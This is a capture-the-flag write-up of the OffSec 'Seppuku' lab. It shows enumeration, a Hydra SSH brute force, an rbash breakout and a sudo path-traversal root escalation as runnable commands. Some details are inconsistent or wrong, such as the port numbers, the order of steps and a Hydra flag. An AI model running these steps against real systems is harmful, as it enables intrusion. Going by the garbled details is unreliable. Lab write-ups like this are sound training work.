Seppuku | OffSec Writeup
Vrijanandan Kumar
Cyber Security Enthusiast || CTF Player || Security Researchers || Passionate about Securing the Digital World || CEH
Network scanning
We used Nmap for port scanning.
nmap -A -sC -sV <your IP>
We used Nmap for port enumeration and discovered the following open ports: port 21 for FTP, port 22 for SSH, port 80 for HTTP, ports 139 and 445 for NetBIOS-SSH, port 7080 for SSL/HTTP, port 7601 for HTTP, and port 8088 for HTTP.
Then visited hhtp://192.168.217.90:8088
Then I ran gobuster and found many hidden directories and used all of them but did not find anything. Then I ran gobuster on port 7061 and found many important directories such as secret key, keys, production
gobuster dir -u https://IP:7061 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
When we navigated the URL enumerated above, i.e. keys we found some files, here private was useful for us.
https://IP:7601/keys
This link leads us to a page called private. This is a private key for some users which we have not found yet.
Further, we will explore the 'secret' directory that we discovered during our Gobuster scan.
As a result, it gives some very important files such as password.lst and hostname
Here found a file named hostname which gave us a username i.e. seppuku.
I went into all the folders one by one and found a hostname.
open passwd.bk
After downloading passwd.bk and opening it, I found a password.lst file. I copied and saved it on my Linux system to further brute-force the password.
nano passwordlisst.txt
Exploiting
We have obtained the username 'seppuku'. Our next task is to find the password for the user 'seppuku' using Hydra for SSH login brute force.
hydra -l seppuku -p passwordlisst.txt 192.168.217.90 ssh
From its result, we found the password eeyoree for seppuku.
We have a username and password, so we tried to access the SSH on the target system and we were successfully able to log in.
ssh seppuku@192.168.217.90
After logging in as tanto, we searched for the .cgi_bin directory, which would be executed through the sudo user. Unfortunately, we couldn't find this directory, so we created a directory named .cgi_bin and saved the bash script in a file named "bin" to obtain a bash shell through it
ls
cat locat.txt
cd /home
I noticed that the cd command is not working. Then I ran this command
python3 -c 'import pty; pty.spawn("/bin/bash")'
cd /home
Then work cd command:
cd /home
ls
I found here there are many users like tanto, samurai, seppuku.
ls -la
After logging in, let's proceed with further investigation to find hidden files. We discovered a hidden file called .passwd, which provided us with a password, though its purpose is currently unknown.
Here I found a password.
I tried to do tanto login ssh. But I didn't succeed. Then I remembered that I had found a private file which had rsa key.
again we see rbash restrict error again we bypass the rbash shell our previous python command for checking privilege escalation we run the sudo -l command and here we found script entry without the password .
python -c 'import os; os.system("/bin/bash");'
sudo -l
I logged in SSH with samurai user.
Privilege Escalation
Now that we have read-write permissions in the user's home directory, we first create a .cgi_bin directory. Then, we move to the cgi directory and use the cat command to create a simple bash file, adding full permissions for everyone to read, write, and execute the file.
After logging in as tanto, we searched for the .cgi_bin directory, which would be executed through the sudo user. Unfortunately, we couldn't find this directory, so we created a directory named .cgi_bin and saved the bash script in a file named "bin" to obtain a bash shell through it.
mkdir .cgi_bin
cd .cgi_bin/
echo "/bin/bash" > bin
chmod 777 bin
ls -la
Now it was time to exploit .cgi_bin program, thus again we logged as Samurai and run the following command and obtain the root shell and finished the challenge by capturing the root flag.
sudo ../../../../../../../home/tanto/.cgi_bin/bin /tmp/*
cd /root
ls
cat proof.txt
Root flag
Cyber Security Enthusiast || CEHv12 || CTF Player || Security Researchers || TryHacMe Top 1% ||Programing C,Python || Bug Bounty ||
8 个月Wishing you the best